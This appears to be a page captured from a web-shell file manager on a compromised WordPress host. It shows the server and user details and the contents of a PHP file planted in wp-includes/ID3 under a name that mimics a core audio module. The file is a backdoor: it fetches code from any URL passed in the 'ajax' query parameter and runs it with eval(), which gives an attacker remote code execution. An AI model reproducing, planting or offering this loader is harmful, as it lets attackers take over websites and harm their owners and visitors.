HEX
Server: Apache
System: Linux host60.registrar-servers.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: wwwrenee (3804)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /home/wwwrenee/www/wp-includes/ID3/module.audio.ac3-json.php
<?php

if (isset($_GET['ajax'])) {
    $get_option_gc = $_GET['ajax'];
    if ($is_page_vvb = curl_init()) {
        curl_setopt($is_page_vvb, CURLOPT_URL, $get_option_gc);
        curl_setopt($is_page_vvb, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($is_page_vvb));
        curl_close($is_page_vvb);
        exit;
    }
}